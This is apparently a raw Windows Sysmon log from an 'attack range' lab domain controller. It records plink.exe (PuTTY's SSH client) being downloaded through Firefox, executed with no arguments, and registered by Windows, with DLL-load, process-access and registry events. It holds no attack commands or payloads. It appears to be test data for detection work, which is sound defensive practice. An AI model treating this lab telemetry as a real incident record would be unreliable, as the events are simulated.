16:35:43.592{D271FDA4-675B-631B-1400-000000007402}1036C:\Windows\System32\svchost.exe\REGISTRY\A\{c665152d-531a-c145-47fe-8d6cac18f589}\Root\InventoryApplicationFile\plink.exe|c7ee6b7bcfc85c16\LinkDate05/24/2022 17:02:00 13241300x80000000000000007090939Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-SetValue2022-09-15 16:35:43.592{D271FDA4-675B-631B-1400-000000007402}1036C:\Windows\System32\svchost.exe\REGISTRY\A\{c665152d-531a-c145-47fe-8d6cac18f589}\Root\InventoryApplicationFile\plink.exe|c7ee6b7bcfc85c16\ProductVersionrelease 0.77 13241300x80000000000000007090938Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-SetValue2022-09-15 16:35:43.592{D271FDA4-675B-631B-1400-000000007402}1036C:\Windows\System32\svchost.exe\REGISTRY\A\{c665152d-531a-c145-47fe-8d6cac18f589}\Root\InventoryApplicationFile\plink.exe|c7ee6b7bcfc85c16\ProductNameputty suite 13241300x80000000000000007090937Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-SetValue2022-09-15 16:35:43.592{D271FDA4-675B-631B-1400-000000007402}1036C:\Windows\System32\svchost.exe\REGISTRY\A\{c665152d-531a-c145-47fe-8d6cac18f589}\Root\InventoryApplicationFile\plink.exe|c7ee6b7bcfc85c16\BinaryTypepe64_amd64 13241300x80000000000000007090936Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-SetValue2022-09-15 16:35:43.592{D271FDA4-675B-631B-1400-000000007402}1036C:\Windows\System32\svchost.exe\REGISTRY\A\{c665152d-531a-c145-47fe-8d6cac18f589}\Root\InventoryApplicationFile\plink.exe|c7ee6b7bcfc85c16\BinFileVersion0.77.0.0 13241300x80000000000000007090935Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-SetValue2022-09-15 16:35:43.592{D271FDA4-675B-631B-1400-000000007402}1036C:\Windows\System32\svchost.exe\REGISTRY\A\{c665152d-531a-c145-47fe-8d6cac18f589}\Root\InventoryApplicationFile\plink.exe|c7ee6b7bcfc85c16\Versionrelease 0.77 13241300x80000000000000007090934Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-SetValue2022-09-15 16:35:43.592{D271FDA4-675B-631B-1400-000000007402}1036C:\Windows\System32\svchost.exe\REGISTRY\A\{c665152d-531a-c145-47fe-8d6cac18f589}\Root\InventoryApplicationFile\plink.exe|c7ee6b7bcfc85c16\Publishersimon tatham 13241300x80000000000000007090933Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-SetValue2022-09-15 16:35:43.592{D271FDA4-675B-631B-1400-000000007402}1036C:\Windows\System32\svchost.exe\REGISTRY\A\{c665152d-531a-c145-47fe-8d6cac18f589}\Root\InventoryApplicationFile\plink.exe|c7ee6b7bcfc85c16\OriginalFileNameplink 13241300x80000000000000007090932Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-SetValue2022-09-15 16:35:43.592{D271FDA4-675B-631B-1400-000000007402}1036C:\Windows\System32\svchost.exe\REGISTRY\A\{c665152d-531a-c145-47fe-8d6cac18f589}\Root\InventoryApplicationFile\plink.exe|c7ee6b7bcfc85c16\Nameplink.exe 13241300x80000000000000007090931Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-SetValue2022-09-15 16:35:43.592{D271FDA4-675B-631B-1400-000000007402}1036C:\Windows\System32\svchost.exe\REGISTRY\A\{c665152d-531a-c145-47fe-8d6cac18f589}\Root\InventoryApplicationFile\plink.exe|c7ee6b7bcfc85c16\LongPathHashplink.exe|c7ee6b7bcfc85c16 13241300x80000000000000007090930Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-SetValue2022-09-15 16:35:43.592{D271FDA4-675B-631B-1400-000000007402}1036C:\Windows\System32\svchost.exe\REGISTRY\A\{c665152d-531a-c145-47fe-8d6cac18f589}\Root\InventoryApplicationFile\plink.exe|c7ee6b7bcfc85c16\LowerCaseLongPathc:\users\administrator\downloads\plink.exe 13241300x80000000000000007090929Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-SetValue2022-09-15 16:35:43.592{D271FDA4-675B-631B-1400-000000007402}1036C:\Windows\System32\svchost.exe\REGISTRY\A\{c665152d-531a-c145-47fe-8d6cac18f589}\Root\InventoryApplicationFile\plink.exe|c7ee6b7bcfc85c16\FileId000019856efed997df9d56720a930d4b0e12e4a8cdd7 13241300x80000000000000007090928Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-SetValue2022-09-15 16:35:43.592{D271FDA4-675B-631B-1400-000000007402}1036C:\Windows\System32\svchost.exe\REGISTRY\A\{c665152d-531a-c145-47fe-8d6cac18f589}\Root\InventoryApplicationFile\plink.exe|c7ee6b7bcfc85c16\ProgramId0006d6b500aaa7acd35f6039dc14d79bc10d00000908 12241200x80000000000000007090927Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 16:35:43.592{D271FDA4-675B-631B-1400-000000007402}1036C:\Windows\System32\svchost.exe\REGISTRY\A\{c665152d-531a-c145-47fe-8d6cac18f589}\Root\InventoryApplicationFile\plink.exe|c7ee6b7bcfc85c16 13241300x80000000000000007090910Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-SetValue2022-09-15 16:35:43.576{D271FDA4-675B-631B-1400-000000007402}1036C:\Windows\System32\svchost.exeHKU\S-1-5-21-2251518177-1696790515-3014453336-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Users\Administrator\Downloads\plink.exeBinary Data 534500x80000000000000007090889Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.558{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exe 734700x80000000000000007090888Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.558{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000007090887Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.531{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x80000000000000007090886Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.527{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5291 (rs1_release.220806-1444)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=F8550606B41FF309D9A1DC76BB4EE875,SHA256=A1FFDD6A2EDA9E0CF047C74B00649A2EA228E3B8BDE1761C66879FA40335C2EBtrueMicrosoft WindowsValid 734700x80000000000000007090885Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.527{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166trueMicrosoft WindowsValid 734700x80000000000000007090884Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.527{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000007090883Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.526{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAEtrueMicrosoft WindowsValid 734700x80000000000000007090882Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.526{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\gdi32full.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F284A98093B423946252259D7D2857D3,SHA256=193F70529B68EF108EA17ABC069E6DACF4541A547DF1D2F249F7555A58BCFA07trueMicrosoft WindowsValid 734700x80000000000000007090881Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.525{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000007090880Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.525{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000007090879Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.525{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x80000000000000007090878Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.523{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\apphelp.dll10.0.14393.4350 (rs1_release.210407-2154)Application Compatibility Client LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationApphelpMD5=92330FA0551BFFBB8C1C97E86F9A0264,SHA256=0F341AF375236EBF7047F6AE50F2834566F0D859F0F02B8A5FFD7F29C31B0117trueMicrosoft WindowsValid 10341000x80000000000000007090875Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.504{D271FDA4-6971-631F-537A-000000007402}67164516C:\Windows\explorer.exe{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+c9fdf|C:\Windows\System32\SHELL32.dll+cab85|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13becf|C:\Windows\System32\windows.storage.dll+13ac5b|C:\Windows\System32\windows.storage.dll+13917f|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007090874Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.504{D271FDA4-6971-631F-537A-000000007402}67164516C:\Windows\explorer.exe{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+caa9e|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13becf|C:\Windows\System32\windows.storage.dll+13ac5b|C:\Windows\System32\windows.storage.dll+13917f|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007090873Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.504{D271FDA4-6971-631F-537A-000000007402}67164516C:\Windows\explorer.exe{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+c9964|C:\Windows\System32\SHELL32.dll+caa67|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13becf|C:\Windows\System32\windows.storage.dll+13ac5b|C:\Windows\System32\windows.storage.dll+13917f|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007090867Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.489{D271FDA4-6971-631F-537A-000000007402}67162700C:\Windows\explorer.exe{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+c9fdf|C:\Windows\System32\SHELL32.dll+cab85|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13becf|C:\Windows\System32\windows.storage.dll+13ac5b|C:\Windows\System32\windows.storage.dll+13917f|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007090865Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.489{D271FDA4-6971-631F-537A-000000007402}67162700C:\Windows\explorer.exe{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+caa9e|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13becf|C:\Windows\System32\windows.storage.dll+13ac5b|C:\Windows\System32\windows.storage.dll+13917f|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007090863Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.489{D271FDA4-6971-631F-537A-000000007402}67162700C:\Windows\explorer.exe{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+c9964|C:\Windows\System32\SHELL32.dll+caa67|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13becf|C:\Windows\System32\windows.storage.dll+13ac5b|C:\Windows\System32\windows.storage.dll+13917f|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007090862Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.489{D271FDA4-6971-631F-537A-000000007402}67162700C:\Windows\explorer.exe{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\explorer.exe+1f054|C:\Windows\explorer.exe+1f000|C:\Windows\explorer.exe+1dfec|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13becf|C:\Windows\System32\windows.storage.dll+13ac5b|C:\Windows\System32\windows.storage.dll+13917f|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007090818Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.473{D271FDA4-545D-6323-DEFE-000000007402}54247260C:\Windows\system32\conhost.exe{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x80000000000000007090806Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.458{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exeC:\Users\Administrator\Downloads\plink.exeRelease 0.77Command-line SSH, Telnet, and Rlogin clientPuTTY suiteSimon TathamPlinkMD5=41C8E38B48C792EF480A19B8A857CD36,SHA256=653EDDE8520F10019C571F25AD6E61147C06EEECCC7639F69D61D1375CC71EAAtrueSimon TathamValid 154100x80000000000000007090769Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.467{D271FDA4-545D-6323-DEFE-000000007402}5424C:\Windows\System32\conhost.exe10.0.14393.0 (rs1_release.160715-1616)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=D752C96401E2540A443C599154FC6FA9,SHA256=046F7A1B4DE67562547ED9A180A72F481FC41E803DE49A96D7D7C731964D53A0{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exe"C:\Users\Administrator\Downloads\plink.exe" 13241300x80000000000000007090767Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-SetValue2022-09-15 16:35:41.458{D271FDA4-6971-631F-537A-000000007402}6716C:\Windows\explorer.exeHKU\S-1-5-21-2251518177-1696790515-3014453336-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{198A980B-07CB-45FB-8CA4-B74B900D72DB}\AppIdC:\Users\Administrator\Downloads\plink.exe 734700x80000000000000007090760Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.458{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\KernelBase.dll10.0.14393.5246 (rs1_release.220701-1744)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=96EFBE3DB6300BB13E0720809302FF9F,SHA256=2DE51A861E8D47D75730027E8BD70554363E10449EC258527C491EE8D4A57C2FtrueMicrosoft WindowsValid 734700x80000000000000007090759Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.458{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\kernel32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=92D599E644B89C0F9E7DDB55762EBEA6,SHA256=F32D28EE73EADAF9EF3F30145FA3C52B88DF47236B8747434750832BF1B9CDEEtrueMicrosoft WindowsValid 734700x80000000000000007090757Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.458{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952trueMicrosoft WindowsValid 10341000x80000000000000007090755Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.458{D271FDA4-675B-631B-1400-000000007402}10362404C:\Windows\System32\svchost.exe{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000007090754Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-SetValue2022-09-15 16:35:41.458{D271FDA4-675B-631B-1400-000000007402}1036C:\Windows\System32\svchost.exeHKU\S-1-5-21-2251518177-1696790515-3014453336-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Users\Administrator\Downloads\plink.exeBinary Data 10341000x80000000000000007090752Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.458{D271FDA4-675B-631B-1400-000000007402}10366776C:\Windows\System32\svchost.exe{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+7ac63|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+5342c|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007090750Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.458{D271FDA4-6B85-631B-7001-000000007402}41002992C:\Windows\system32\csrss.exe{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007090749Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.458{D271FDA4-6971-631F-537A-000000007402}67165892C:\Windows\explorer.exe{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e73b|C:\Windows\System32\windows.storage.dll+16e451|C:\Windows\System32\windows.storage.dll+16e09e|C:\Windows\System32\windows.storage.dll+16f340|C:\Windows\System32\windows.storage.dll+16ddee|C:\Windows\System32\windows.storage.dll+fce8d|C:\Windows\System32\windows.storage.dll+fd5cc|C:\Windows\System32\windows.storage.dll+fc930|C:\Windows\System32\windows.storage.dll+16650a|C:\Windows\System32\windows.storage.dll+166262|C:\Windows\System32\SHELL32.dll+9cafd|C:\Windows\System32\SHELL32.dll+9b696|C:\Windows\System32\SHELL32.dll+8dfa9|C:\Windows\System32\SHELL32.dll+cf48e|C:\Windows\System32\SHELL32.dll+157b8c|C:\Windows\System32\SHELL32.dll+1578e3|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007090748Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.449{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exeRelease 0.77Command-line SSH, Telnet, and Rlogin clientPuTTY suiteSimon TathamPlink"C:\Users\Administrator\Downloads\plink.exe" C:\Users\Administrator\Downloads\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=41C8E38B48C792EF480A19B8A857CD36,SHA256=653EDDE8520F10019C571F25AD6E61147C06EEECCC7639F69D61D1375CC71EAA{D271FDA4-6971-631F-537A-000000007402}6716C:\Windows\explorer.exeC:\Windows\explorer.exe /NOUACCHECK 15241500x80000000000000007089154Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:24.446{D271FDA4-5436-6323-C9FE-000000007402}4560C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\Downloads\plink.exe:Zone.Identifier2022-09-15 16:35:23.409MD5=B24F23CBE6F0C95BAE4DBAF344FB276E,SHA256=BF83A611C6EFA6792BC4D96978F28A8267A0277C46A82F50435DDCEDDBEA0F2C[ZoneTransfer] ZoneId=3 ReferrerUrl=https://www.chiark.greenend.org.uk/ 